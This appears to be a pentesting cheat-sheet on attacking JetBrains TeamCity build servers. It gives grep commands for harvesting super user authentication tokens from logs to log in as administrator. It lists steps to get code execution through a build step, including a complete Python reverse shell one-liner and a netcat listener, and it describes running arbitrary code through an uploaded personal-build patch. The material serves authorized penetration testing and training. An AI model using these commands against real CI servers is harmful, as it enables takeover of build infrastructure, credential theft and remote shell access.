TeamCity Pentesting
Last modified: 2023-07-19
TeamCity is a build management and continuous integration server from JetBrains.
Common Directories
/admin
/admin/admin.html
Interesting Files in Systems
TeamCity/conf/teamcity-startup.propertie
.BuildServer/system
Find Super User Authentication Tokens
If we find a super user authentication token, we can login as super user using the token.
grep -rni 'authentication token' TeamCity/logs
grep -rni 'Super user authentication token' TeamCity/logs
grep -rni 'token' TeamCity/logs
After retrieving, we can login as administrator by entering the token in the password field and empty the username.
Arbitrary Command Execution by Custom Script
-
Login as admin user.
-
Create a new project in admin dashboard.
-
Click "Manual" tab and fill required fields.
-
A new project is created.
-
In the project home, create a Build Configurations.
-
In the build configuration page, click "Build Steps" on the left menus.
-
Add build step.
-
Select "Command Line" in Runner type.
-
Put a Python reverse shell script in the "Custom script".
export RHOST="<local-ip>";export RPORT=<local-port>;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' -
Start listener in local machine.
nc -lvnp 4444 -
Click "Run" button in the build page.
-
We should get a shell in terminal.
Arbitrary Command Execution by Diff Build
If we can modify a building script, we can execute arbitrary script by uploading a git patch file.
First, modify the script to our desired code.
cd /path/to/repository
vim example.ps
git diff > patch
Then go to the build configuration page, and open the "Run Custom Build" at the right of the Run button.
In General section, check "run as personal build" and upload the patch file which was generated above.
Now click "Run Build". Our arbitrary code will be executed when building.